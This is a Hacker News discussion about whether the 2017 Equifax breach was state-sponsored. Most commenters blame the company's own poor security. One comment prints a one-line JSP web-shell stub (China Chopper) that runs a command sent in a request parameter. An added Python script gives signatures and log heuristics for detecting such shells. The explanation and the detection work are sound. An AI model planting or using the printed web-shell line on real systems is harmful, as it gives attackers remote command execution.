
The Equifax Hack Has the Hallmarks of State-Sponsored Attack - rayuela
https://www.bloomberg.com/news/features/2017-09-29/the-equifax-hack-has-all-the-hallmarks-of-state-sponsored-pros
======
f055
I guess a "State-Sponsored Attack" sounds better than "we got pwned with a bug
that was known since March that we didn't patch and could have been exploited
by a guy in a basement" [[https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/](https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/)]

~~~
alva
I hate this grubby finger-pointing to a state actor. Sadly, the majority of
non-tech readers will take it as given.

~~~
RhodesianHunter
Considering everything we now know about Russia's attempts to influence our
elections and sow division, is it really unreasonable to think they might try
to throw a wrench into our credit system?

~~~
lowry
Did not they just buy ads on Facebook instead of hacking it?

~~~
_jal
They also attempted hacking (according to the intelligence services) 21
states' election systems, with varying degrees of success.

Pretty sure that qualifies as 'unauthorized access'.

~~~
zaroth
The _Washington Post_ basically exposed this as "Fake News".

[https://www.washingtonpost.com/news/the-fix/wp/2017/09/23/what-we-know-about-the-21-states-targeted-by-russian-hackers/](https://www.washingtonpost.com/news/the-fix/wp/2017/09/23/what-we-know-about-the-21-states-targeted-by-russian-hackers/)

And in case you're interested, here it is from a more _colorful_ source;

[https://theintercept.com/2017/09/28/yet-another-major-russia-story-falls-apart-is-skepticism-permissible-yet/](https://theintercept.com/2017/09/28/yet-another-major-russia-story-falls-apart-is-skepticism-permissible-yet/)

------
gtrubetskoy
And Equifax linking to a fake phishing site by mistake, was that also "state
sponsored"? Give me a break...

The Equifax hack has the hallmarks of Equifax's complete incompetence when it
comes to security, and that is all.

~~~
24gttghh
My version of Hanlon's Razor:

Be cautious when declaring an event as being born from malice, when the event
is adequately explained by incompetence.

~~~
foxyv
My version is: Never attribute to malice what could be attributed to profit
motive.

~~~
mrguyorama
Profit at the expense of anything else IS malice

------
rdtsc
Ah yes, the super-spy excuse. That worked well before, why not go for it
again.

It basically boils down to "Don't blame us, we are up against the super-
sophisticated Chinese / KGB / aliens etc". It's a way to deflect blame.

> In a speech at the University of Georgia last month, he [now ex-CEO]
> described a stagnating credit reporting agency with a “culture of tenure”
> and “average talent.”

When the CEO talks publicly about average talent, you can be sure the real
talent is well below average.

~~~
g051051
> > In a speech at the University of Georgia last month, he [now ex-CEO]
> > described a stagnating credit reporting agency with a “culture of tenure”
> > and “average talent.”

That was his description of the organization he inherited, in 2005. It was not
his opinion of the organization as it stands now.

~~~
QAPereo
Right, clearly there's been a vast improvement under his tenure! /s

------
tyingq
Perhaps, but I'm not convinced that nation state resources were needed.

A different Equifax site had an admin account with the password..."admin"

[https://www.cnbc.com/2017/09/14/equifax-used-admin-for-the-login-and-password-of-a-non-us-database.html](https://www.cnbc.com/2017/09/14/equifax-used-admin-for-the-login-and-password-of-a-non-us-database.html)

~~~
astura
Even if nation state resources weren't _needed_ that doesn't necessarily take
away from the fact that it [may] have the hallmarks of a nation state attack.

I only scanned TFA but it didn't seem to say "Wow, this was a sophisticated
attack only a country could pull off," but more of "the [scant] evidence so
far seems to point to..."

~~~
g051051
No, it goes into considerable detail about the nature of the attack, how it
changed once it was passed off from an "entry team" to a more advanced group
of hackers, and the level of sophistication.

~~~
astura
Right, but maybe I wasn't clear, by "pulling this hack off," I meant the
_initial_ intrusion, not what happened next.

~~~
g051051
Again, the article mentions that the initial group struggled to get any sort
of foothold after the initial intrusion...it wasn't until the "advanced" team
took over that the _real_ breach began: bypassing firewalls, installing back
doors and web shells, etc.

------
bogomipz
Claiming victimization by a "state-sponsored" actor has now become the "go to"
tool in public relations crisis management of data breaches.

Rather than admit their own complete failure and negligence these companies
are now seeking to portray themselves as victims along with the people they
have permanently put at risk and profited from in the process. It's
disgusting.

If you leave your car unlocked with the keys in the ignition and someone
steals the car, you are not a victim you are an idiot.

~~~
socalnate1
"If you leave your car unlocked with the keys in the ignition and someone
steals the car, you are not a victim you are an idiot."

Well, no. You are both a victim and an idiot. These things are not mutually
exclusive.

------
dspillett
The Equifax Hack Has the Hallmarks of... complete incompetence that may, on
this occasion, have been exploited by a state-sponsored actor.

Who knows what other actors could have exploited it instead or as well?

In any case the incompetence was the root cause and I wouldn't trust Equifax
to speak my weight.

------
eutropia
> Mandiant, the security consulting firm hired by Equifax to investigate the
> breach, said in a report distributed to Equifax clients on Sept. 19 that it
> didn't have enough data to identify either the attackers or their country of
> origin.

Isn't it possible that with the incredible bounty of state-power hacking tools
floating around the web that it's just a criminal organization? Or are we
trying to paint a cold-cyber-war narrative to put Equifax in a sympathetic
light?

------
sschueller
Horseshit. Don't blame your systemic incompetence on a state actor. A five
year old could get in.

~~~
RhodesianHunter
The fact that the hack was simple due to incompetence, and the possibility of
it being state sponsored are not mutually exclusive.

~~~
1001101
True. If that's the case, one could make the argument that they let both our
country, and their customers down.

------
ianhawes
I have to say at first I felt the same way most of the other commenters did:
Claiming this was a state-sponsored attack is a convenient scapegoat.

I'm still skeptical, but I wouldn't dismiss it outright.

I think in the next 6-12 months, if a wholesale PII marketplace doesn't
appear, the odds of a state-sponsored attack go up dramatically. The economics
of wholesale fraud are such that you make money selling to other fraudsters,
not trying to exploit the information yourself (setting up new accounts,
taking over existing accounts, etc..).

For what it's worth, even if this attack was executed by actors unaffiliated
with the government, this information WILL make its way to intelligence
organization(s) in their home country. Unlike in the US, foreign and domestic
intelligence services maintain a much closer relationship with the hackers in
their home country.

~~~
matt_wulfeck
It’s a good test, though the exploit was so egregious I really doubt it was
one person or group who took advantage of it.

If the data never sees the light of day in the shadier parts of our internet
then their narrative is more believable.

------
kennell
> muh russian hackers

This nonsense is really getting old

~~~
0xfeba
Get used to it. Cyberwarfare is only going to increase.

And there's little doubt Russia interfered with the USA's election. To what
degree is being investigated.

~~~
cuckcuckspruce
Because as we all know, the US is special and gets to fuck with everybody
else's elections (up to and including the violent overthrow of a
democratically elected government and state executed assassination), but do it
to them and suddenly it's a warlike act.

~~~
0xfeba
> Because as we all know, the US is special and gets to fuck with everybody
> else's elections (up to and including the violent overthrow of a
> democratically elected government and state executed assassination), but do
> it to them and suddenly it's a warlike act.

I have no idea of your political inclinations, but generally I find it odd
that the right is overall giving a pass to Russia with this. Deflecting as you
are doing, and not answering the issue at hand.

Russia, formerly via Communism, was all but our enemy shortly after WW2. They
are still an adversary. So, we decided it was in our best interest to fuck
with them, and many other countries because we were "the good guys". Yes, this
got convoluted and contrived, and completely futile -- especially w.r.t.
Vietnam, the Bay of Pigs, Panama, and many others I imagine.

But even considering all that, it still doesn't justify Russia interfering
with our election. Surprising? No.

But why are so many on the right giving Russia a free-pass? It all seems to be
the same motivation that kept us in Vietnam for years after it was known to be
a waste: To avoid admitting you were wrong; to try and save face.

~~~
cuckcuckspruce
I don't think they should get a free pass, so good job on your assumptions
there, kiddo.

I'm more taking issue with people that are shocked, just shocked that other
countries would treat the US the way that the US treats other countries. It's
childish and amusing. The power of American Exceptionalism, what can you do?

~~~
0xfeba
> I don't think they should get a free pass, so good job on your assumptions
> there, kiddo.

The first sentence of my reply explicitly stated that I was not talking about
you, just that you are doing the same thing the right is doing to deflect.
Remember, this was your original low effort post:

> > muh russian hackers
>
> This nonsense is really getting old

So to claim now that:

> I'm more taking issue with people that are shocked, just shocked that other
> countries would treat the US the way that the US treats other countries.

Is what you are taking issue with appears to be disingenuous. You implied all
this Russia hacking stuff was nonsense.

------
feelin_googley
"The business generates a gross margin of about 90%."

Well, I can see why they would have to cut costs associated with employing
customer service representatives to handle requests for copies of credit
reports from consumers.

Faced with such financial pressures, they probably had no choice but to make
private consumer data accessible via public internet and use a "web app" in
order to scale back their costly customer service headcount.

This has all the hallmarks of sound business judgment.

------
nikcub
> Groups known to exploit web shells most effectively include teams with links
> to Chinese intelligence, including one nicknamed Shell Crew.

That's just silly. It is very common when exploiting web apps to utilize a web
shell to persist your access and then to work from that to implement better
and more permanent access.

Web shells are easy to find and they make a lot of noise (POSTs in the web
logs). They are very easy to spot in any org that has their web/app roots
under version control, so advanced adversaries will use them temporarily - not
install 30 of them

> One of the tools used by the hackers—China Chopper—has a Chinese-language
> interface, but is also in use outside China, people familiar with the
> malware said.

China Chopper is an old web shell[0]. It works by having a very thin server
component that simply runs an eval of a POST variable. Most of the
intelligence is in the thick client (read about it at the links below - its
pretty cool but by no means advanced).

While it was developed in China - the interface is in English[1]. There isn't
even much of an interface, as it will reconstruct the server file explorer,
shell, db connection etc.

You can't identify China Chopper from just the server component, since it is a
simple:

    <% Runtime.getRuntime().exec(request.getParameter("password")); %>

Most decent scanners will have a signature for "exec("[2]

This is what I still don't understand about the Equifax hack. They had an
entire infosec team, ran a SOC, had all sorts of high-end product installed
(including complete traffic logs) yet someone could exfil 10GB+ of data using
a known web app exploit and simple web shell.

There is more to this story, and it will be told in what happened once the
attackers penetrated the first web server and how they were able to pull off
the lateral moves to get to the credit database. I sense there is going to be
some horrible security practice and hygiene on the internal network that
allowed this to happen (think broad permissions, full database access, no db
query monitoring, no encryption internally, etc.).

[0] [https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html)

[1] [http://informationonsecurity.blogspot.com.au/2012/11/china-chopper-webshell.html](http://informationonsecurity.blogspot.com.au/2012/11/china-chopper-webshell.html)

[2] [https://www.tenable.com/pvs-plugins/9488](https://www.tenable.com/pvs-plugins/9488)
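The comment above names three places a thin web shell gives itself away: an `exec(`-style signature in the source, a file the web root's version control does not know about, and a path in the access log that is driven only by POSTs. The script below is an added illustration of those three defender-side checks, not code from the thread or from any scanner vendor; the signatures, the sample source tree and the six log lines are all constructed here.

```python
import re
from collections import Counter, defaultdict

# Signatures for thin web-shell server stubs. The JSP pattern is the exec(
# one the comment says scanners key on; the PHP and ASP.NET variants are the
# analogous one-liners. All three are constructed for this example.
SHELL_PATTERNS = [
    re.compile(r'Runtime\.getRuntime\(\)\.exec\(\s*request\.getParameter\('),
    re.compile(r'\beval\(\s*\$_(?:POST|REQUEST)\['),
    re.compile(r'\beval\(\s*Request\.Item\['),
]

def scan_sources(files):
    """files: {path: source text}. Return paths matching a shell signature."""
    return sorted(p for p, src in files.items()
                  if any(pat.search(src) for pat in SHELL_PATTERNS))

def untracked_deployed(files, tracked):
    """Deployed files absent from version control: a dropped shell lands here."""
    return sorted(set(files) - set(tracked))

# Common Log Format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3}) (\S+)')

def post_only_paths(log_lines, min_posts=3):
    """Paths taking repeated POSTs but never a GET: a shell is driven purely
    by POSTs, unlike ordinary pages and forms that are also loaded with GET."""
    by_path = defaultdict(Counter)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            _ip, method, path, _status, _size = m.groups()
            by_path[path][method] += 1
    return sorted(p for p, c in by_path.items()
                  if c['POST'] >= min_posts and c['GET'] == 0)

# Constructed sample data: a tiny deployed tree, its tracked file list, and
# access-log lines using RFC 5737 documentation addresses.
SOURCE_TREE = {
    'webapp/index.jsp': '<%@ page language="java" %><html><body>Home</body></html>',
    'webapp/login.jsp': '<% String u = request.getParameter("user"); %>',
    'webapp/images/help.jsp': '<% Runtime.getRuntime().exec(request.getParameter("password")); %>',
}
TRACKED = ['webapp/index.jsp', 'webapp/login.jsp']
LOG_LINES = [
    '203.0.113.5 - - [10/Sep/2017:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Sep/2017:10:01:09 +0000] "POST /login.jsp HTTP/1.1" 302 0',
    '198.51.100.7 - - [10/Sep/2017:10:02:11 +0000] "GET /login.jsp HTTP/1.1" 200 2210',
    '198.51.100.7 - - [10/Sep/2017:10:02:30 +0000] "POST /images/help.jsp HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/Sep/2017:10:02:31 +0000] "POST /images/help.jsp HTTP/1.1" 200 4096',
    '198.51.100.7 - - [10/Sep/2017:10:02:33 +0000] "POST /images/help.jsp HTTP/1.1" 200 17',
]

if __name__ == '__main__':
    print('signature hits:', scan_sources(SOURCE_TREE))
    print('untracked files:', untracked_deployed(SOURCE_TREE, TRACKED))
    print('POST-only paths:', post_only_paths(LOG_LINES))
```

Each check alone produces false positives (a legitimate API endpoint can be POST-only), so the value is in the overlap: a file that is untracked, matches a signature and is only ever POSTed to is worth an immediate look.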

------
CoolGuySteve
So then it follows that Equifax and similar agencies are structural weak
points in our banking system and dismantling them asap is vital to national
security.

Too big to flail.

------
falcolas
Not that I agree or disagree with the attack being state sponsored, but what
other way to find people potentially ripe for being turned into spies than
those with crushing debt, or other publicly available judgements against them?

Money is a great motivator, especially when you can use one database to find
those in most desperate need of it who are also working for companies ripe for
exploitation.

------
KaiserPro
It was terrible security, implemented poorly.

It doesn't matter if it was a state or not, it should have been so
comprehensive, or easy.

The basic design of where the data was placed, and how easy it was to traverse
the network, combined with a stunning lack of monitoring means that it could
almost have been a script kiddie who did this.

_almost_

------
Communitivity
"Never attribute to malice that which can be adequately explained by
stupidity, but don't rule out malice." - 'Hanlon's Razor' (possibly
Heinlein's Razor), by Robert Heinlein and others

------
castratikron
And I suppose the Chief Security Officer at the time, who held a degree in
music and had no relevant experience in technology or security, was a state-
appointed spy, too? Surely the Russians pulled a lot of strings to get her
into that position. There is no other possible explanation.

[http://www.marketwatch.com/story/equifax-ceo-hired-a-music-major-as-the-companys-chief-security-officer-2017-09-15](http://www.marketwatch.com/story/equifax-ceo-hired-a-music-major-as-the-companys-chief-security-officer-2017-09-15)

~~~
g051051
> had no relevant experience in technology or security

This has been thoroughly debunked. She had extensive industry experience in a
series of increasingly important security and compliance roles going back at
least 15 years. Furthermore, the Bloomberg article even paints her in a
positive light as someone trying to do the right thing against corporate
opposition.

~~~
castratikron
I didn't know that'd been debunked. They should correct the article if that's
true.

------
idibidiart
Nice national security cover to preempt lawsuits. Can't be sued if Uncle Sam
failed to protect you. Or can you still be sued?

------
CaptSpify
Sure, it's possible it was a state-sponsored attack, but that mostly doesn't
matter. What matters is that this system should have never been set up in the
first place. There's no reason that we need to consolidate this data into one
big target, and then put that target into an easily breachable safe.

------
tresp
I'm surprised how many readers reject the premise outright. I thought the part
'this wasn't a credit card play, this wasn't a get info on every American
play' was somewhat compelling. plus the part about looking into a handful of
people with high security value?

------
banned1
Well, if Hilary can use this excuse...

------
hprotagonist
"remember the credit agency" doesn't have much of a ring to it, though.

------
codazoda
Why is the news spouting this BS? I assume a state-sponsored attack makes for
more readers. Sigh.

~~~
ribfeast
Could be native advertising?

------
jaclaz
TL;DR:

All in all it revolves around:

>... some investigators inside Equifax to suspect a nation-state was behind
the hack. Many of the tools used were Chinese, and these people say the
Equifax breach _has the hallmarks of similar intrusions_ ...

The following sentence:

>Others involved in the investigation aren't so sure, saying the evidence is
inconclusive at best or points in other directions.

is the exact opposite.

And the one following is even worse:

>One person briefed on the probe being conducted by the Federal Bureau of
Investigation and U.S. intelligence agencies said that there is evidence that
a nation-state may have played a role, but that it doesn't point to China. The
person declined to name the country involved because the details are
classified.

So with the investigation still not concluded there is a small number (not
quantified) of people saying it was a Nation-State AND Chinese, another small
group (also not quantified) saying that it was NOT a Nation-State (and thus
NOT Chinese) and ONE single person stating that State-Sponsored intelligence
"may have played a role" BUT NOT Chinese.

All the rest is about how good are (or were) the people at Equifax and how
hard they tried to make this not happen, but of course you can do nothing if
you are the target of a Nation-State intelligence, particularly if Chinese.

~~~
ianhawes
> Many of the tools used were Chinese

The web shell identified, China Chopper, actually has an English UI (not
Chinese as the article claims). The only relationship to China is that it was
originally compiled by a user that regularly visits the Google HK domain.

------
marank
Hope I don't forget about this case, when I need to argue about maintenance
costs, security upgrades etc, also that's why I like Go so much, you don't
need or supposed to use a full fledged framework, at most a router with no
dependencies and lightweight, but best if nothing.

~~~
nv-vn
What does Go have to do with Equifax?

